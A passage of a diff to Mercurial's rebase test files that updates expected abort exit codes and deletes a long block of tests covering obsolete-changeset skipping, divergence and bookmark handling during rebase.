@@ -401,7 +401,7 @@
transaction abort!
rollback completed
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
$ hg tglogp
@ 7: 401ccec5e39f secret 'C'
|
@@ -451,7 +451,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
$ hg tglogp
@ 7: 401ccec5e39f secret 'C'
|
--- a/tests/test-rebase-mq.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-mq.t Tue Apr 20 11:01:06 2021 -0400
@@ -46,14 +46,14 @@
$ hg rebase -s 1 -d 3
abort: cannot rebase onto an applied mq patch
- [255]
+ [20]
Rebase - same thing, but mq patch is default dest:
$ hg up -q 1
$ hg rebase
abort: cannot rebase onto an applied mq patch
- [255]
+ [20]
$ hg up -q qtip
Rebase - generate a conflict:
--- a/tests/test-rebase-named-branches.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-named-branches.t Tue Apr 20 11:01:06 2021 -0400
@@ -247,7 +247,7 @@
$ hg rebase -s 5 -d 6
abort: source and destination form a cycle
- [255]
+ [10]
$ hg rebase -s 6 -d 5
rebasing 6:3944801ae4ea "dev-two named branch"
--- a/tests/test-rebase-newancestor.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-newancestor.t Tue Apr 20 11:01:06 2021 -0400
@@ -154,7 +154,7 @@
rebasing 2:ec2c14fb2984 "dev: f-dev stuff"
rebasing 4:4b019212aaf6 "dev: merge default"
abort: rebasing 4:4b019212aaf6 will include unwanted changes from 1:1d1a643d390e
- [255]
+ [10]
$ cd ..
@@ -314,7 +314,7 @@
rebasing 6:b296604d9846 E "E"
rebasing 7:caa9781e507d F tip "F"
abort: rebasing 7:caa9781e507d will include unwanted changes from 4:d6003a550c2c or 3:c1e6b162678d
- [255]
+ [10]
The warning does not get printed if there is no unwanted change detected:
--- a/tests/test-rebase-obsolete.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-obsolete.t Tue Apr 20 11:01:06 2021 -0400
@@ -560,7 +560,7 @@
rebasing 2:b18e25de2cf5 D "D"
rebasing 6:f15c3adaf214 F tip "F"
abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents
- [255]
+ [10]
$ cd ..
@@ -743,1398 +743,3 @@
1 new orphan changesets
$ cd ..
-
-Skip obsolete changeset even with multiple hops
------------------------------------------------
-
-setup
-
- $ hg init obsskip
- $ cd obsskip
- $ cat << EOF >> .hg/hgrc
- > [experimental]
- > rebaseskipobsolete = True
- > [extensions]
- > strip =
- > EOF
- $ echo A > A
- $ hg add A
- $ hg commit -m A
- $ echo B > B
- $ hg add B
- $ hg commit -m B0
- $ hg commit --amend -m B1
- $ hg commit --amend -m B2
- $ hg up --hidden 'desc(B0)'
- 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
- updated to hidden changeset a8b11f55fb19
- (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290)
- $ echo C > C
- $ hg add C
- $ hg commit -m C
- 1 new orphan changesets
- $ hg log -G
- @ 4:212cb178bcbb C
- |
- | o 3:261e70097290 B2
- | |
- x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290)
- |/
- o 0:4a2df7238c3b A
-
-
-Rebase finds its way in a chain of marker
-
- $ hg rebase -d 'desc(B2)'
- note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2"
- rebasing 4:212cb178bcbb tip "C"
-
-Even when the chain include missing node
-
- $ hg up --hidden 'desc(B0)'
- 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
- updated to hidden changeset a8b11f55fb19
- (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290)
- $ echo D > D
- $ hg add D
- $ hg commit -m D
- 1 new orphan changesets
- $ hg --hidden strip -r 'desc(B1)'
- saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg
- 1 new orphan changesets
- $ hg log -G
- @ 5:1a79b7535141 D
- |
- | o 4:ff2c4d47b71d C
- | |
- | o 2:261e70097290 B2
- | |
- x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290)
- |/
- o 0:4a2df7238c3b A
-
-
- $ hg rebase -d 'desc(B2)'
- note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2"
- rebasing 5:1a79b7535141 tip "D"
- $ hg up 4
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
- $ echo "O" > O
- $ hg add O
- $ hg commit -m O
- $ echo "P" > P
- $ hg add P
- $ hg commit -m P
- $ hg log -G
- @ 8:8d47583e023f P
- |
- o 7:360bbaa7d3ce O
- |
- | o 6:9c48361117de D
- | |
- o | 4:ff2c4d47b71d C
- |/
- o 2:261e70097290 B2
- |
- o 0:4a2df7238c3b A
-
- $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true
- 1 new obsolescence markers
- obsoleted 1 changesets
- 1 new orphan changesets
- $ hg rebase -d 6 -r "4::"
- rebasing 4:ff2c4d47b71d "C"
- note: not rebasing 7:360bbaa7d3ce "O", it has no successor
- rebasing 8:8d47583e023f tip "P"
-
-If all the changeset to be rebased are obsolete and present in the destination, we
-should display a friendly error message
-
- $ hg log -G
- @ 10:121d9e3bc4c6 P
- |
- o 9:4be60e099a77 C
- |
- o 6:9c48361117de D
- |
- o 2:261e70097290 B2
- |
- o 0:4a2df7238c3b A
-
-
- $ hg up 9
- 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
- $ echo "non-relevant change" > nonrelevant
- $ hg add nonrelevant
- $ hg commit -m nonrelevant
- created new head
- $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true
- 1 new obsolescence markers
- obsoleted 1 changesets
- $ hg log -G
- @ 11:f44da1f4954c nonrelevant (pruned)
- |
- | o 10:121d9e3bc4c6 P
- |/
- o 9:4be60e099a77 C
- |
- o 6:9c48361117de D
- |
- o 2:261e70097290 B2
- |
- o 0:4a2df7238c3b A
-
- $ hg rebase -r . -d 10
- note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor
-
-If a rebase is going to create divergence, it should abort
-
- $ hg log -G
- @ 10:121d9e3bc4c6 P
- |
- o 9:4be60e099a77 C
- |
- o 6:9c48361117de D
- |
- o 2:261e70097290 B2
- |
- o 0:4a2df7238c3b A
-
-
- $ hg up 9
- 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
- $ echo "john" > doe
- $ hg add doe
- $ hg commit -m "john doe"
- created new head
- $ hg up 10
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
- $ echo "foo" > bar
- $ hg add bar
- $ hg commit --amend -m "10'"
- $ hg up 10 --hidden
- 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
- updated to hidden changeset 121d9e3bc4c6
- (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2)
- $ echo "bar" > foo
- $ hg add foo
- $ hg commit -m "bar foo"
- 1 new orphan changesets
- $ hg log -G
- @ 14:73568ab6879d bar foo
- |
- | o 13:77d874d096a2 10'
- | |
- | | o 12:3eb461388009 john doe
- | |/
- x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2)
- |/
- o 9:4be60e099a77 C
- |
- o 6:9c48361117de D
- |
- o 2:261e70097290 B2
- |
- o 0:4a2df7238c3b A
-
- $ hg summary
- parent: 14:73568ab6879d tip (orphan)
- bar foo
- branch: default
- commit: (clean)
- update: 2 new changesets, 3 branch heads (merge)
- phases: 8 draft
- orphan: 1 changesets
- $ hg rebase -s 10 -d 12
- abort: this rebase will cause divergences from: 121d9e3bc4c6
- (to force the rebase please set experimental.evolution.allowdivergence=True)
- [255]
- $ hg log -G
- @ 14:73568ab6879d bar foo
- |
- | o 13:77d874d096a2 10'
- | |
- | | o 12:3eb461388009 john doe
- | |/
- x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2)
- |/
- o 9:4be60e099a77 C
- |
- o 6:9c48361117de D
- |
- o 2:261e70097290 B2
- |
- o 0:4a2df7238c3b A
-
-With experimental.evolution.allowdivergence=True, rebase can create divergence
-
- $ hg rebase -s 10 -d 12 --config experimental.evolution.allowdivergence=True
- rebasing 10:121d9e3bc4c6 "P"
- rebasing 14:73568ab6879d tip "bar foo"
- 2 new content-divergent changesets
- $ hg summary
- parent: 16:61bd55f69bc4 tip
- bar foo
- branch: default
- commit: (clean)
- update: 1 new changesets, 2 branch heads (merge)
- phases: 8 draft
- content-divergent: 2 changesets
-
-rebase --continue + skipped rev because their successors are in destination
-we make a change in trunk and work on conflicting changes to make rebase abort.
-
- $ hg log -G -r 16::
- @ 16:61bd55f69bc4 bar foo
- |
- ~
-
-Create the two changes in trunk
- $ printf "a" > willconflict
- $ hg add willconflict
- $ hg commit -m "willconflict first version"
-
- $ printf "dummy" > C
- $ hg commit -m "dummy change successor"
-
-Create the changes that we will rebase
- $ hg update -C 16 -q
- $ printf "b" > willconflict
- $ hg add willconflict
- $ hg commit -m "willconflict second version"
- created new head
- $ printf "dummy" > K
- $ hg add K
- $ hg commit -m "dummy change"
- $ printf "dummy" > L
- $ hg add L
- $ hg commit -m "dummy change"
- $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true
- 1 new obsolescence markers
- obsoleted 1 changesets
- 1 new orphan changesets
-
- $ hg log -G -r 16::
- @ 21:7bdc8a87673d dummy change
- |
- x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51)
- |
- o 19:b82fb57ea638 willconflict second version
- |
- | o 18:601db7a18f51 dummy change successor
- | |
- | o 17:357ddf1602d5 willconflict first version
- |/
- o 16:61bd55f69bc4 bar foo
- |
- ~
- $ hg rebase -r ".^^ + .^ + ." -d 18
- rebasing 19:b82fb57ea638 "willconflict second version"
- merging willconflict
- warning: conflicts while merging willconflict! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
-
- $ hg resolve --mark willconflict
- (no more unresolved files)
- continue: hg rebase --continue
- $ hg rebase --continue
- rebasing 19:b82fb57ea638 "willconflict second version"
- note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor"
- rebasing 21:7bdc8a87673d tip "dummy change"
- $ cd ..
-
-Divergence cases due to obsolete changesets
--------------------------------------------
-
-We should ignore branches with unstable changesets when they are based on an
-obsolete changeset which successor is in rebase set.
-
- $ hg init divergence
- $ cd divergence
- $ cat >> .hg/hgrc << EOF
- > [extensions]
- > strip =
- > [alias]
- > strip = strip --no-backup --quiet
- > [templates]
- > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n'
- > EOF
-
- $ hg debugdrawdag <<EOF
- > e f
- > | |
- > d' d # replace: d -> d'
- > \ /
- > c
- > |
- > x b
- > \|
- > a
- > EOF
- 1 new orphan changesets
- $ hg log -G -r 'a'::
- * 7:1143e9adc121 f
- |
- | o 6:d60ebfa0f1cb e
- | |
- | o 5:027ad6c5830d d'
- | |
- x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d)
- |/
- o 3:a82ac2b38757 c
- |
- | o 2:630d7c95eff7 x
- | |
- o | 1:488e1b7e7341 b
- |/
- o 0:b173517d0057 a
-
-
-Changeset d and its descendants are excluded to avoid divergence of d, which
-would occur because the successor of d (d') is also in rebaseset. As a
-consequence f (descendant of d) is left behind.
-
- $ hg rebase -b 'e' -d 'x'
- rebasing 1:488e1b7e7341 b "b"
- rebasing 3:a82ac2b38757 c "c"
- rebasing 5:027ad6c5830d d' "d'"
- rebasing 6:d60ebfa0f1cb e "e"
- note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence
- $ hg log -G -r 'a'::
- o 11:eb6d63fc4ed5 e
- |
- o 10:44d8c724a70c d'
- |
- o 9:d008e6b4d3fd c
- |
- o 8:67e8f4a16c49 b
- |
- | * 7:1143e9adc121 f
- | |
- | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5)
- | | |
- | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c)
- | | |
- | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d)
- | |/
- | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd)
- | |
- o | 2:630d7c95eff7 x
- | |
- | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49)
- |/
- o 0:b173517d0057 a
-
- $ hg strip -r 8:
- $ hg log -G -r 'a'::
- * 7:1143e9adc121 f
- |
- | o 6:d60ebfa0f1cb e
- | |
- | o 5:027ad6c5830d d'
- | |
- x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d)
- |/
- o 3:a82ac2b38757 c
- |
- | o 2:630d7c95eff7 x
- | |
- o | 1:488e1b7e7341 b
- |/
- o 0:b173517d0057 a
-
-
-If the rebase set has an obsolete (d) with a successor (d') outside the rebase
-set and none in destination, we still get the divergence warning.
-By allowing divergence, we can perform the rebase.
-
- $ hg rebase -r 'c'::'f' -d 'x'
- abort: this rebase will cause divergences from: 76be324c128b
- (to force the rebase please set experimental.evolution.allowdivergence=True)
- [255]
- $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x'
- rebasing 3:a82ac2b38757 c "c"
- rebasing 4:76be324c128b d "d"
- rebasing 7:1143e9adc121 f tip "f"
- 1 new orphan changesets
- 2 new content-divergent changesets
- $ hg log -G -r 'a':: -T instabilities
- o 10:e1744ea07510 f
- |
- * 9:e2b36ea9a0a0 d (content-divergent)
- |
- o 8:6a0376de376e c
- |
- | x 7:1143e9adc121 f
- | |
- | | * 6:d60ebfa0f1cb e (orphan)
- | | |
- | | * 5:027ad6c5830d d' (orphan content-divergent)
- | | |
- | x | 4:76be324c128b d
- | |/
- | x 3:a82ac2b38757 c
- | |
- o | 2:630d7c95eff7 x
- | |
- | o 1:488e1b7e7341 b
- |/
- o 0:b173517d0057 a
-
- $ hg strip -r 8:
-
-(Not skipping obsoletes means that divergence is allowed.)
-
- $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x'
- rebasing 3:a82ac2b38757 c "c"
- rebasing 4:76be324c128b d "d"
- rebasing 7:1143e9adc121 f tip "f"
- 1 new orphan changesets
- 2 new content-divergent changesets
-
- $ hg strip -r 0:
-
-Similar test on a more complex graph
-
- $ hg debugdrawdag <<EOF
- > g
- > |
- > f e
- > | |
- > e' d # replace: e -> e'
- > \ /
- > c
- > |
- > x b
- > \|
- > a
- > EOF
- 1 new orphan changesets
- $ hg log -G -r 'a':
- * 8:2876ce66c6eb g
- |
- | o 7:3ffec603ab53 f
- | |
- x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea)
- | |
- | o 5:63324dc512ea e'
- | |
- o | 4:76be324c128b d
- |/
- o 3:a82ac2b38757 c
- |
- | o 2:630d7c95eff7 x
- | |
- o | 1:488e1b7e7341 b
- |/
- o 0:b173517d0057 a
-
- $ hg rebase -b 'f' -d 'x'
- rebasing 1:488e1b7e7341 b "b"
- rebasing 3:a82ac2b38757 c "c"
- rebasing 5:63324dc512ea e' "e'"
- rebasing 7:3ffec603ab53 f "f"
- rebasing 4:76be324c128b d "d"
- note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence
- $ hg log -G -r 'a':
- o 13:a1707a5b7c2c d
- |
- | o 12:ef6251596616 f
- | |
- | o 11:b6f172e64af9 e'
- |/
- o 10:d008e6b4d3fd c
- |
- o 9:67e8f4a16c49 b
- |
- | * 8:2876ce66c6eb g
- | |
- | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616)
- | | |
- | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea)
- | | |
- | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9)
- | | |
- | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c)
- | |/
- | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd)
- | |
- o | 2:630d7c95eff7 x
- | |
- | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49)
- |/
- o 0:b173517d0057 a
-
-
-issue5782
- $ hg strip -r 0:
- $ hg debugdrawdag <<EOF
- > d
- > |
- > c1 c # replace: c -> c1
- > \ /
- > b
- > |
- > a
- > EOF
- 1 new orphan changesets
- $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'`
- 1 new obsolescence markers
- obsoleted 1 changesets
- $ hg log -G -r 'a': --hidden
- * 4:76be324c128b d
- |
- | x 3:ef8a456de8fa c1 (pruned)
- | |
- x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa)
- |/
- o 1:488e1b7e7341 b
- |
- o 0:b173517d0057 a
-
- $ hg rebase -d 0 -r 2
- rebasing 2:a82ac2b38757 c "c"
- $ hg log -G -r 'a': --hidden
- o 5:69ad416a4a26 c
- |
- | * 4:76be324c128b d
- | |
- | | x 3:ef8a456de8fa c1 (pruned)
- | | |
- | x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa rewritten using rebase as 5:69ad416a4a26)
- | |/
- | o 1:488e1b7e7341 b
- |/
- o 0:b173517d0057 a
-
- $ cd ..
-
-Rebase merge where successor of one parent is equal to destination (issue5198)
-
- $ hg init p1-succ-is-dest
- $ cd p1-succ-is-dest
-
- $ hg debugdrawdag <<EOF
- > F
- > /|
- > E D B # replace: D -> B
- > \|/
- > A
- > EOF
- 1 new orphan changesets
-
- $ hg rebase -d B -s D
- note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B"
- rebasing 4:66f1a38021c9 F tip "F"
- $ hg log -G
- o 5:50e9d60b99c6 F
- |\
- | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6)
- | |/|
- | o | 3:7fb047a69f22 E
- | | |
- | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961)
- | |/
- o | 1:112478962961 B
- |/
- o 0:426bada5c675 A
-
- $ cd ..
-
-Rebase merge where successor of other parent is equal to destination
-
- $ hg init p2-succ-is-dest
- $ cd p2-succ-is-dest
-
- $ hg debugdrawdag <<EOF
- > F
- > /|
- > E D B # replace: E -> B
- > \|/
- > A
- > EOF
- 1 new orphan changesets
-
- $ hg rebase -d B -s E
- note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B"
- rebasing 4:66f1a38021c9 F tip "F"
- $ hg log -G
- o 5:aae1787dacee F
- |\
- | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee)
- | |/|
- | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961)
- | | |
- | o | 2:b18e25de2cf5 D
- | |/
- o / 1:112478962961 B
- |/
- o 0:426bada5c675 A
-
- $ cd ..
-
-Rebase merge where successor of one parent is ancestor of destination
-
- $ hg init p1-succ-in-dest
- $ cd p1-succ-in-dest
-
- $ hg debugdrawdag <<EOF
- > F C
- > /| |
- > E D B # replace: D -> B
- > \|/
- > A
- > EOF
- 1 new orphan changesets
-
- $ hg rebase -d C -s D
- note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B"
- rebasing 5:66f1a38021c9 F tip "F"
-
- $ hg log -G
- o 6:0913febf6439 F
- |\
- +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439)
- | | |
- | o | 4:26805aba1e60 C
- | | |
- o | | 3:7fb047a69f22 E
- | | |
- +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961)
- | |
- | o 1:112478962961 B
- |/
- o 0:426bada5c675 A
-
- $ cd ..
-
-Rebase merge where successor of other parent is ancestor of destination
-
- $ hg init p2-succ-in-dest
- $ cd p2-succ-in-dest
-
- $ hg debugdrawdag <<EOF
- > F C
- > /| |
- > E D B # replace: E -> B
- > \|/
- > A
- > EOF
- 1 new orphan changesets
-
- $ hg rebase -d C -s E
- note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B"
- rebasing 5:66f1a38021c9 F tip "F"
- $ hg log -G
- o 6:c6ab0cc6d220 F
- |\
- +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220)
- | | |
- | o | 4:26805aba1e60 C
- | | |
- | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961)
- | | |
- o---+ 2:b18e25de2cf5 D
- / /
- o / 1:112478962961 B
- |/
- o 0:426bada5c675 A
-
- $ cd ..
-
-Rebase merge where successor of one parent is ancestor of destination
-
- $ hg init p1-succ-in-dest-b
- $ cd p1-succ-in-dest-b
-
- $ hg debugdrawdag <<EOF
- > F C
- > /| |
- > E D B # replace: E -> B
- > \|/
- > A
- > EOF
- 1 new orphan changesets
-
- $ hg rebase -d C -b F
- rebasing 2:b18e25de2cf5 D "D"
- note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B"
- rebasing 5:66f1a38021c9 F tip "F"
- note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes
- $ hg log -G
- o 6:8f47515dda15 D
- |
- | x 5:66f1a38021c9 F (pruned using rebase)
- | |\
- o | | 4:26805aba1e60 C
- | | |
- | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961)
- | | |
- | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15)
- | |/
- o / 1:112478962961 B
- |/
- o 0:426bada5c675 A
-
- $ cd ..
-
-Rebase merge where successor of other parent is ancestor of destination
-
- $ hg init p2-succ-in-dest-b
- $ cd p2-succ-in-dest-b
-
- $ hg debugdrawdag <<EOF
- > F C
- > /| |
- > E D B # replace: D -> B
- > \|/
- > A
- > EOF
- 1 new orphan changesets
-
- $ hg rebase -d C -b F
- note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B"
- rebasing 3:7fb047a69f22 E "E"
- rebasing 5:66f1a38021c9 F tip "F"
- note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes
-
- $ hg log -G
- o 6:533690786a86 E
- |
- | x 5:66f1a38021c9 F (pruned using rebase)
- | |\
- o | | 4:26805aba1e60 C
- | | |
- | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86)
- | | |
- | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961)
- | |/
- o / 1:112478962961 B
- |/
- o 0:426bada5c675 A
-
- $ cd ..
-
-Rebase merge where extinct node has successor that is not an ancestor of
-destination
-
- $ hg init extinct-with-succ-not-in-dest
- $ cd extinct-with-succ-not-in-dest
-
- $ hg debugdrawdag <<EOF
- > E C # replace: C -> E
- > | |
- > D B
- > |/
- > A
- > EOF
-
- $ hg rebase -d D -s B
- rebasing 1:112478962961 B "B"
- note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence
-
- $ cd ..
-
- $ hg init p2-succ-in-dest-c
- $ cd p2-succ-in-dest-c
-
-The scenario here was that B::D were developed on default. B was queued on
-stable, but amended before being push to hg-committed. C was queued on default,
-along with unrelated J.
-
- $ hg debugdrawdag <<EOF
- > J
- > |
- > F
- > |
- > E
- > | D
- > | |
- > | C # replace: C -> F
- > | | H I # replace: B -> H -> I
- > | B |/
- > |/ G
- > A
- > EOF
- 1 new orphan changesets
-
-This strip seems to be the key to avoid an early divergence warning.
- $ hg --config extensions.strip= --hidden strip -qr H
- 1 new orphan changesets
-
- $ hg rebase -b 'desc("D")' -d 'desc("J")'
- abort: this rebase will cause divergences from: 112478962961
- (to force the rebase please set experimental.evolution.allowdivergence=True)
- [255]
-
-Rebase merge where both parents have successors in destination
-
- $ hg init p12-succ-in-dest
- $ cd p12-succ-in-dest
- $ hg debugdrawdag <<'EOS'
- > E F
- > /| /| # replace: A -> C
- > A B C D # replace: B -> D
- > | |
- > X Y
- > EOS
- 1 new orphan changesets
- $ hg rebase -r A+B+E -d F
- note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C"
- note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D"
- rebasing 7:dac5d11c5a7d E tip "E"
- abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f
- [255]
- $ cd ..
-
-Rebase a non-clean merge. One parent has successor in destination, the other
-parent moves as requested.
-
- $ hg init p1-succ-p2-move
- $ cd p1-succ-p2-move
- $ hg debugdrawdag <<'EOS'
- > D Z
- > /| | # replace: A -> C
- > A B C # D/D = D
- > EOS
- 1 new orphan changesets
- $ hg rebase -r A+B+D -d Z
- note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C"
- rebasing 1:fc2b737bb2e5 B "B"
- rebasing 3:b8ed089c80ad D "D"
-
- $ rm .hg/localtags
- $ hg log -G
- o 6:e4f78693cc88 D
- |
- o 5:76840d832e98 B
- |
- o 4:50e41c1f3950 Z
- |
- o 2:96cc3511f894 C
-
- $ hg files -r tip
- B
- C
- D
- Z
-
- $ cd ..
-
- $ hg init p1-move-p2-succ
- $ cd p1-move-p2-succ
- $ hg debugdrawdag <<'EOS'
- > D Z
- > /| | # replace: B -> C
- > A B C # D/D = D
- > EOS
- 1 new orphan changesets
- $ hg rebase -r B+A+D -d Z
- rebasing 0:426bada5c675 A "A"
- note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C"
- rebasing 3:b8ed089c80ad D "D"
-
- $ rm .hg/localtags
- $ hg log -G
- o 6:1b355ed94d82 D
- |
- o 5:a81a74d764a6 A
- |
- o 4:50e41c1f3950 Z
- |
- o 2:96cc3511f894 C
-
- $ hg files -r tip
- A
- C
- D
- Z
-
- $ cd ..
-
-Test that bookmark is moved and working dir is updated when all changesets have
-equivalents in destination
- $ hg init rbsrepo && cd rbsrepo
- $ echo "[experimental]" > .hg/hgrc
- $ echo "evolution=true" >> .hg/hgrc
- $ echo "rebaseskipobsolete=on" >> .hg/hgrc
- $ echo root > root && hg ci -Am root
- adding root
- $ echo a > a && hg ci -Am a
- adding a
- $ hg up 0
- 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
- $ echo b > b && hg ci -Am b
- adding b
- created new head
- $ hg rebase -r 2 -d 1
- rebasing 2:1e9a3c00cbe9 tip "b"
- $ hg log -r . # working dir is at rev 3 (successor of 2)
- 3:be1832deae9a b (no-eol)
- $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now
- bookmarking hidden changeset 1e9a3c00cbe9
- (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a)
- $ hg up 2 && hg log -r . # working dir is at rev 2 again
- 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
- 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol)
- $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1
- note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b"
-Check that working directory and bookmark was updated to rev 3 although rev 2
-was skipped
- $ hg log -r .
- 3:be1832deae9a b (no-eol)
- $ hg bookmarks
- mybook 3:be1832deae9a
- $ hg debugobsolete --rev tip
- 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'}
-
-Obsoleted working parent and bookmark could be moved if an ancestor of working
-parent gets moved:
-
- $ hg init $TESTTMP/ancestor-wd-move
- $ cd $TESTTMP/ancestor-wd-move
- $ hg debugdrawdag <<'EOS'
- > E D1 # rebase: D1 -> D2
- > | |
- > | C
- > D2 |
- > | B
- > |/
- > A
- > EOS
- $ hg update D1 -q
- $ hg bookmark book -i
- $ hg rebase -r B+D1 -d E
- rebasing 1:112478962961 B "B"
- note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2"
- 1 new orphan changesets
- $ hg log -G -T '{desc} {bookmarks}'
- @ B book
- |
- | x D1
- | |
- o | E
- | |
- | * C
- | |
- o | D2
- | |
- | x B
- |/
- o A
-
-Rebasing a merge with one of its parent having a hidden successor
-
- $ hg init $TESTTMP/merge-p1-hidden-successor
- $ cd $TESTTMP/merge-p1-hidden-successor
-
- $ hg debugdrawdag <<'EOS'
- > E
- > |
- > B3 B2 # amend: B1 -> B2 -> B3
- > |/ # B2 is hidden
- > | D
- > | |\
- > | B1 C
- > |/
- > A
- > EOS
- 1 new orphan changesets
-
- $ eval `hg tags -T '{tag}={node}\n'`
- $ rm .hg/localtags
-
- $ hg rebase -r $D -d $E
- rebasing 5:9e62094e4d94 "D"
-
- $ hg log -G
- o 7:a699d059adcf D
- |\
- | o 6:ecc93090a95c E
- | |
- | o 4:0dc878468a23 B3
- | |
- o | 1:96cc3511f894 C
- /
- o 0:426bada5c675 A
-
-For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.),
-rebasestate may contain hidden hashes. "rebase --abort" should work regardless.
-
- $ hg init $TESTTMP/hidden-state1
- $ cd $TESTTMP/hidden-state1
- $ cat >> .hg/hgrc <<EOF
- > [experimental]
- > rebaseskipobsolete=0
- > EOF
-
- $ hg debugdrawdag <<'EOS'
- > C
- > |
- > D B # prune: B, C
- > |/ # B/D=B
- > A
- > EOS
-
- $ eval `hg tags -T '{tag}={node}\n'`
- $ rm .hg/localtags
-
- $ hg update -q $C --hidden
- updated to hidden changeset 7829726be4dc
- (hidden revision '7829726be4dc' is pruned)
- $ hg rebase -s $B -d $D
- rebasing 1:2ec65233581b "B"
- merging D
- warning: conflicts while merging D! (edit, then use 'hg resolve --mark')
